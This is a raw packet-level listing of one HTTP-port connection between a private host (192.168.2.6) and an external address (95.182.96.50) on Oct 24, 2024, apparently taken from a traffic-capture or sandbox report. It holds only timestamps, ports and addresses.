Oct 24, 2024 13:54:14.547902107 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.547909975 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.547945023 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.547950983 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.547996998 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.548434973 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.548482895 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.548491001 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.548527956 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.548538923 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.548563957 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.548599958 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.548602104 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.548625946 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.548643112 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.549263954 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.549309015 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.660845995 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.660985947 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.660990953 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.661025047 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.661062956 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.661098003 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.661134005 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.661220074 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.661272049 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.661307096 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.661320925 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.661341906 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.661345005 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.661386013 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.661504030 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.661555052 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.661576033 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.661609888 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.661628962 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.661648035 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.661648989 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.661695004 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.662029028 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.662081957 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.662084103 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.662120104 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.662127018 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.662156105 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.662170887 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.662192106 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.662204981 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.662225962 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.662240028 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.662264109 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.662276983 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.662313938 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.662933111 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.662986040 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.662997007 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.663022995 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.663034916 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.663058043 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.663070917 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.663094044 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.663106918 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.663130999 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.663141966 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.663167953 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.663177967 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.663212061 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.663836002 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.663888931 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.663918018 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.663953066 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.663965940 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.663989067 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.664022923 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.664041042 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.664041042 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.664058924 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.664064884 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.664097071 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.664117098 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.664164066 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.664589882 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.664815903 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.776474953 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.776555061 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.776592970 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.776627064 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.776663065 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.776696920 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.776720047 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.776732922 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.776768923 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.776808977 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.776827097 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.776856899 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.776901007 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.776954889 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.776958942 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.776998043 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.777015924 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.777050972 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.777154922 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.777208090 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.777209044 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.777244091 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.777254105 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.777278900 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.777287960 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.777317047 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.777328014 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.777376890 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.777551889 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.777606964 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.777606964 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.777647018 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.777669907 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.777702093 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.777718067 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.777770996 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.777771950 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.777815104 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.777821064 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.777849913 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.777863026 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.777885914 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.777894974 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.777920961 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.777935028 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.777957916 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.777967930 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.778048992 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.778639078 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.778695107 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.778709888 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.778729916 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.778740883 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.778765917 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.778801918 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.778820038 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.778836966 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.778856039 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.778877974 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.778898001 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.778913021 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.778928041 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.778964996 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.891653061 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.891792059 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.891819954 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.891833067 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.891870975 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.891879082 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.891896009 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.891918898 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.891930103 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.891956091 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.891968966 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.891995907 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.892015934 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.892040014 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.892055035 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.892100096 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.892112017 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.892132044 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.892151117 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.892168999 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.892174006 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.892209053 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.892215967 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.892246008 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.892277956 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.892282009 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.892319918 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.892338037 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.892503977 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.892539978 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.892563105 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.892580032 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.892595053 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.892631054 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.892651081 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.892666101 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.892672062 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.892704010 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.892719984 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.892752886 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.892919064 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.892987013 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.893004894 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.893043041 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.893057108 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.893111944 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.893122911 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.893147945 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.893171072 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.893186092 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.893193960 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.893222094 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.893234015 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.893260002 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.893270016 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.893291950 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.893307924 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.893353939 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.893713951 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.893748045 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.893769026 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.893783092 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.893790007 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.893820047 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.893831015 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.893858910 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.893891096 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.893894911 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.893929958 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.893944025 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.893965006 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.894000053 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.894062996 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.894098997 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.006984949 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.007030010 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.007086992 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.007105112 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.007122993 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.007147074 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.007147074 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.007160902 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.007169008 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.007199049 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.007205963 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.007236958 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.007242918 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.007276058 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.007281065 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.007339001 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.007431030 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.007467031 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.007483959 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.007503986 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.007550955 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.007550955 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.007594109 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.007631063 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.007653952 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.007678986 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.007791042 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.007822990 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.007858038 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.007944107 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.007945061 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.007945061 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.007958889 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.007994890 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.008013964 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.008030891 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.008038044 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.008066893 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.008078098 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.008105040 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.008115053 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.008157969 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.008317947 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.008352995 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.008374929 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.008399010 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.008407116 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.008440971 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.008460045 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.008476973 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.008481026 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.008512020 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.008526087 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.008549929 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.008560896 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.008584976 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.008593082 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.008620977 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.008634090 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.008657932 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.008668900 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.008708000 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.008955002 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.008990049 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.009011984 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.009026051 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.009032011 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.009063005 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.009074926 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.009099960 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.009111881 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.009146929 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.009279966 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.009315014 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.009332895 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.009349108 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.009357929 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.009397984 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.052248001 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.052316904 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.052411079 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.052464962 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.122251987 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.122312069 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.122345924 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.122349024 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.122361898 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.122384071 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.122395039 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.122421980 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.122438908 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.122457027 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.122468948 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.122509003 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.122579098 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.122632027 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.122653961 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.122690916 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.122708082 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.122726917 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.122736931 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.122762918 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.122775078 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.122800112 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.122812986 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.122848988 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.122982025 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.123019934 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.123038054 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.123056889 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.123066902 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.123091936 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.123105049 CEST	49714	80	192.168.2.6	95.182.96.50
